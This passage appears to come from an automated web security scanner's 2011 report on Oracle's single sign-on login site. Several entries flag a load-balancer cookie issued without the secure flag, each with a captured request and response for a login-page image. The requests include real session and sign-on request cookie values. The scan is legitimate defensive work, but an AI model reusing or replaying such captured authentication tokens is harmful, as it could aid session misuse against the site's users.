bSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 51
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_ck
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a...................!.......,..............P.;

7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 188
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCBj6uHK6EVADUS1EHWFB01t_cl
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;

7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCXF6uHK6EVADUS1EHWFB01t_dQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;

7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_cj
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.D.di........
.,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;

7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpq6uHK6EVADUS1EHWFB01t_cC
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;

7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-line.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aX